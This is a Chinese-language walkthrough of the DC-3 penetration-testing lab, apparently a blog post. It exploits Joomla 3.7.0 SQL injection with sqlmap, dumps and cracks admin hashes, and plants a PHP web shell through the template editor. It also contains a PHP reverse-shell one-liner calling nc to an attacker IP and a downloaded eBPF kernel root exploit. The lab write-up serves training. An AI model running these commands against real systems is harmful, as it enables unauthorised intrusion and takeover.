渗透DC-3-内核提权-文件共享


0x00 环境介绍

DC-3环境需要修改一下变量,不然无法进入,如下即可

0x01 信息搜集

老规矩了 IP 端口 web………
1)IP收集

asp-scan -l

2)端口收集

nmap -A -p- 192.168.213.151

3)子域名目录爆破

dirb http://192.168.213.151

4)指纹收集

whatweb http://192.168.213.151

访问web页面开始渗透

0x02 渗透测试

登录web页面,熟悉的一眼看到框架—Joomla

继续使用框架扫描
joomscan –url http://192.168.213.151
得到版本
版本
使用search寻找框架漏洞

searchsploit Joomla 3.7.0

发现sql注入
SQL注入
保存本地,查看

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt  jommla.txt 
cat  jommla.txt 

poc:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

使用sqlmap开扫

sqlmap.py -u "http://192.168.213.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"


爆库:

sqlmap.py -u "http://192.168.213.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbs

库
爆表:

sqlmap.py -u "http://192.168.213.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables

爆字段:

sqlmap.py -u "http://192.168.213.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns  -p list[fullordering]


字段
查具体值

sqlmap.py -u "http://192.168.213.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T "#__users" -C "username,password"  --dump

账号密码
得到hash值,下一步爆破使用json爆破hash得到密码—-snoopy
john破解
登录后台,继续收集渗透线索
web页面
登录后台地址
1
渗透突破点

2
3

通过实验发现,该处代码可以直接在站内运行,这就给我们提供的木马注入的位置,
写入一句话木马,准备getshell,注意写入木马不需要重新添加标签

访问页面管理地址,得到木马地址,准备连接

获取getshell

写入反弹shell,攻击机建立nc接受,

nc -lnvp 1337
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.220.131 1337 >/tmp/f');?> 

反弹成功
得到更加直观的感觉,获取交互shell

0x03 权限提升

思路:
这次需要用到一个特殊的提权方式,内核提权,首先我们通过查找服务器漏洞得到exp文件,运行提权文件即可

确定服务器版本

lsb_release -a

确定版本为16.04
确定版本为16.04
使用search搜索漏洞
下载漏洞报告,发现exp利用

下载文件:

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

如果无法下载,在攻击机上面下载后用到下列方法,共享到靶机shell
python -m SimpleHTTPServer 8080 #将本路径下文件共享外连
靶机下载:wget http://192.168.213.129:8080/39772.zip

tar -xvf exploit.tar#解压文件
cd ebpf_mapfd_doubleput_exploit/  #进入目录
chmod +x compile.sh #授权
./compile.sh#执行脚本
./doubleput #执行提权脚本等待root权限shell

![运行脚本](https://img-blog.csdnimg.cn/1cc5658d2891403c9e944bc68ed55a04.png?x-oss-process=image
提权成功

提权成功:

0x04 知识点总结

1.内核提权
2.主机共享文件

python -m SimpleHTTPServer 8080 #将本路径下文件共享外连
靶机下载:wget http://192.168.213.129:8080/39772.zip


文章作者: 告白
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 告白 !
  目录